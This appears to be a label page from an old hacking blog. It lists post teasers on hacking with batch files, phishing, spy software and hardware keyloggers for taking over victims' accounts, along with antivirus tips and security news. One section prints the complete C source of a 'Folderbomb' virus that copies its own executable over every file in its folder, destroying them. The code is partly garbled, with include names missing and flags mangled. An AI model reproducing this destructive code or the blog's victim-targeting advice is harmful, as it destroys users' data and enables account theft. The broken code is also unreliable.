Blog links

Showing posts with label HACKERS. Show all posts
Showing posts with label HACKERS. Show all posts

How to Hack using batch files



In this post we'll see how to easily hack using batch files and some online tools.At this point we must know about batch files.In simple words batch file basically holds dos commands and some system commands in sequential order and when it's run executes those commands.You can put the commands in a text file and save it with .bat extension to get the batch file.Enough about batch files.



We need to grab the ip address of the victim.

Please refer to my previous posts about finding ip address of email sender and tracking ip address of anyone by sending email.

Read more

Phishing the phisher : a counter attack tutorial

This post will explain you about phishing which came across me when I used to learn hacking related stuffs.In this post I will be explaining you mode of operation of phishing starting from scratch.Though phishing is old ,it poses as a great threat in the world wild wide web.For security it is needed to get into the source loop holes.So,lets start without wasting much time.


Definition
Phishing is simply the act of creating fake page of any legitimate web-service and host them on net in order to fool the user to get the passwords,credit card no.,social security no. etc

Requirements

Read more

How To Hack A Computer


In this tutorial I’ll show you how win spy software can bu used to hack computer accounts as facebook, yahoo etc. and control computer with remote access .

Read more

How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.


Finding IP address in Gmail

Read more

How to hack Rapid share

Hi all, This is for those who have to wait for about an hour after downloading certain amount of stuff from rapid share. To overcome this time constraint follow these steps:
mega upload Links, Download, Rapid share Links, rapid share movies, rapid share free, hack rapid share, hack mega upload.

RAPID SHARE

Read more

How to Hack an Email using Hardware Keylogger


Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.

Read more

Some Useful Tips To Maintain a Virus Free Computer


Are you fed up with the number of viruses infecting your computer? Then here in this interesting post you will find me telling you about how the various worms, viruses and spywares find their way into your precious computer. Most of the time, they are harmful probably aiming to steal your personal information. In this case, we are more concerned about those that could cause your computer to hang up. Follow these six easy to do tip that can free your computer from viruses.
virus free
1. E-mails:
This is the most of the common way through which spywares, worms, Trojans and viruses find their easy way into your computer. When you have your own private emails, increase the privacy settings and never ever open unsolicited and unknown emails, as they may be the source of the much awaiting harms that can damage your whole computer. To avoid this harming your computer, use very good anti-spam software. Never click links in e-mails if you are not sure what are they.
2. USB thumb or pen drives:
This is another and most common source that could affect your computer in a number of ways. The best option to avoid this from happening is by performing a virus scan before copying any data onto your computer and another small tip is not to double click the pen drive for opening. Use right click to open or explore the files in the drive before opening is the best alternative.
3. Use of MS Outlook:
It is not known that MS Outlook could be a source and the best way to spread and hack into your computer, unless you have a real time antivirus programs running. Alternatives to MS Outlook will include the use Windows Mail (which can even identify spam emails from known sources), Pegasus of thunderbird, or web based programs like hotmail or Yahoo.
4. Internet or World Wide Web:
Even a basic computer user knows that internet is the best way to spread viruses like pandemic and are the main sources of malicious programs like viruses, worms, Trojans, etc., which can range up to 80 percent of the worldwide transfer during surfing of the web. By following some of the best surfing habits this danger could be waded off, which will include by not clicking the pop-up windows or by using pop-up blockers.
5. Search Engines:
Most of us surf the web using mostly with the help of search engines, and one of the best ways either to prevent from visiting malicious website from being listed in your search or to point them out when listed, is by installing some powerful scanners like AVG Link scanner, which is a free ware. Even Mozilla says if a site will harm your computer or not.
6. Use a good antivirus:
If you are looking for one solution that can do most of the jobs mentioned so far, it is also good for preventing from someone else stealing your personal information like online identity, credit card information, password stealing and many other such activities. So always use a powerful antivirus.
Comments are always appreciated!!

Read more

SIMPLE VIRUS CODING


Run this on your own responsibility*/
VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Read more

First Ever iPhone Malware Scanner


VirusBarrierA French security company known for its Mac OS X antivirus software today released the first malware-scanning app for the iPhone and iPad and iPod Touch.
Intego’s VirusBarrier for iOS has been approved by Apple, and debuted on the App Store Tuesday for $2.99.
Because iOS prevents the program from accessing the file system or conducting automatic or scheduled scans — as do virtually all Mac and Windows antivirus software — VirusBarrier must be manually engaged, and then scans only file attachments and files on remote servers, said Peter James, a spokesman for Intego.
VirusBarrier for iOS can scan email attachments in a variety of formats, including Microsoft’s Word, Excel and PowerPoint; PDF documents; JavaScript files; and Windows executables, those files tagged with the .exe extension. It can also scan files in a Dropbox folder, those stored on MobileMe’s iDisk, or files downloaded via the iOS version of Safari.
The scanning engine and signatures — the digital “fingerprints” used to detect malware — in VirusBarrier for iOS are identical to those used by Intego’s Mac OS X product line.
VirusBarrier for iOS lets iPhone and iPad users run on-demand scans of email attachments before those files are opened or forwarded.
When an email attachment is received by the iPhone, iPad or iPod Touch, the user can intercede by calling on VirusBarrier, which then scans the file for possible infection before the file is opened or forwarded to others.
VirusBarrier for iOS can be downloaded to an iPhone, iPad or iPod Touch fromApple’s App Store. It requires iOS 4.0 or later.

Read more

Groupon Leaks Entire Indian User Database


The entire user database of Groupon’s Indian subsidiary Sosasta.com was accidentally published to the Internet and indexed by Google.

Read more

Doppelganger Domain Attack


Doppelganger Domain Attack

Doppelganger Domain AttackDomain typo-squatting is commonly used to spread malware to users whom accidentally misspell a legitimate domain in their web browser. A new type of domain typo-squatting takes advantage of an omission instead of a misspelling.

Read more
2leep.com